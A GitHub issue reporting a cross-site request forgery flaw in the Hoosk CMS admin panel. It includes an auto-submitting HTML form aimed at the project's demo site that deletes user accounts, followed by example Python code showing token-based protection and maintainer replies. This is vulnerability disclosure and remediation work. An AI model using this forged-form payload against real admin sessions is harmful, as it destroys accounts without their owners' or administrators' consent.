CSRF issue that allows attacker to delete an account #53

Closed
3072L opened this issue Apr 12, 2020 · 2 comments · Fixed by #56

3072L commented Apr 12, 2020

Hi, bro. I also found a CSRF issue in the admin page.

When an attacker induces an authenticated admin user to visit a malicious web page, any account can be deleted without the admin user's intention.

How to reproduce the issue:

  1. Log in to the admin page (/admin).
  2. Stay logged in and access an HTML page with the following content:
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hoosk.org/admin/users/delete/userid" method="POST">
      <input type="hidden" name="deleteid" value="userid" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

userid is very easy to guess.

  3. The account with userid = userid is deleted without the admin user's intention.

How to fix this issue:
Set a CSRF token to protect the delete function.
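The fix the report asks for is the synchronizer token pattern: the server issues one unguessable token per admin session, embeds it in its own forms, and refuses any state-changing POST that does not carry it back. The example below is added here to illustrate that check and is not code from the Hoosk project; the `Session` class, `handle_delete` handler and the `csrf_token` field name are hypothetical stand-ins. The cross-site form is a constructed copy of the shape of the report's PoC: the victim's browser attaches the admin cookie to it, but the attacker's page has no way to read the token, so the hardened handler answers 403 while the same form rendered by the admin page itself succeeds. In a real deployment, enabling the web framework's built-in CSRF protection (if it has one) and setting the session cookie to `SameSite=Lax` or `Strict` are the usual ways to get this behaviour on every endpoint rather than one.

```python
import hmac
import secrets
from html.parser import HTMLParser

# Added example: synchronizer-token protection for a state-changing admin
# endpoint. Session, handler and field names are hypothetical stand-ins,
# not the project's own code.


class Session:
    """Server-side session for one logged-in admin (constructed stand-in)."""

    def __init__(self):
        # One unguessable token per session; a cross-site page cannot read it.
        self.csrf_token = secrets.token_urlsafe(32)
        # Constructed user table: id -> username.
        self.users = {"1": "alice", "2": "bob"}


class HiddenFieldParser(HTMLParser):
    """Collects name/value pairs of <input type="hidden"> elements."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def form_fields(html):
    """The fields a browser would POST when this form is auto-submitted."""
    p = HiddenFieldParser()
    p.feed(html)
    return p.fields


def render_delete_form(session, user_id):
    """Legitimate admin page: the per-session token is embedded in the form."""
    return (
        '<form action="/admin/users/delete/{u}" method="POST">'
        '<input type="hidden" name="deleteid" value="{u}" />'
        '<input type="hidden" name="csrf_token" value="{t}" />'
        "</form>"
    ).format(u=user_id, t=session.csrf_token)


def handle_delete(session, form):
    """Hardened handler: refuse any POST whose token is missing or wrong."""
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check does not leak the token via timing.
    if not submitted or not hmac.compare_digest(
        submitted.encode(), session.csrf_token.encode()
    ):
        return 403, "forbidden: missing or invalid CSRF token"
    user_id = form.get("deleteid")
    if user_id not in session.users:
        return 404, "no such user"
    del session.users[user_id]
    return 200, "deleted " + user_id


# Constructed cross-site form with the same shape as the report's PoC: the
# browser will attach the admin's cookie, but the page cannot supply the token.
CROSS_SITE_FORM = (
    '<form action="http://demo.hoosk.org/admin/users/delete/1" method="POST">'
    '<input type="hidden" name="deleteid" value="1" />'
    "</form>"
)


def demo():
    """Run both requests against one session; returns (cross, legit, users)."""
    session = Session()
    # Cross-site request: no token in the submitted fields -> rejected.
    cross = handle_delete(session, form_fields(CROSS_SITE_FORM))
    # Same-site request: the admin page's own form carries the token -> allowed.
    legit = handle_delete(session, form_fields(render_delete_form(session, "1")))
    return cross[0], legit[0], sorted(session.users)


if __name__ == "__main__":
    print(demo())  # (403, 200, ['2'])
```

The token check runs before the user lookup on purpose: a request without a valid token should never reach code that touches the data model, so an attacker also learns nothing about which user ids exist from the response.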

havok89 linked a pull request May 1, 2020 that will close this issue

havok89 (Owner) commented May 1, 2020

Thanks for the issues you raised. I'm finally getting time to work on this now lol

3072L (Author) commented May 8, 2020

you're welcome bro!
